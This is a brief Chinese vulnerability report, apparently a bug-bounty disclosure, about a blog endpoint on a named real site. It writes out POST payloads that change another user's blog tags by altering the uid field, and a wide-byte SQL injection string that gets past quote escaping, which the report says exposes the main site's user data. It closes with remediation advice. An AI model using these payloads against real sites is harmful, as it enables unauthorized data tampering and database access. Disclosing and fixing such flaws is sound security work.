http://blog.house365.com/ajaxuser.php?type=blog&action=atcblogclass&job=add

UPDATE pw_userinfo SET dirdb=......................

发送数据:

blogclass=AAAAAAAAAAAAAAAAA"\&itemid=1&uid=1&name=

注意了哦uid可以随便修改

修改了uid为1用户的博客标签。

gpc开启无法注入? 宽字节帮助你！

blogclass=007&itemid=1&uid=1%df'--&name=

WHERE uid='1€€'#'
呵呵闭合了呢。。。
  

修改了uid为5用户的博客标签。

 gpc开启无法注入? 宽字节帮助你！

blogclass=007&itemid=1&uid=1%df'--&name=

WHERE uid='1€€'#'
呵呵闭合了呢。。。这个是主站注入哦。。。。全部用户的数据在。
修复方案：
uid的SESSION或者cookies验证下.

宽字节注入：

介个建议使用mysql_set_charset设置字符集 mysql_real_escape_string 转义sql语句

字符集为二进制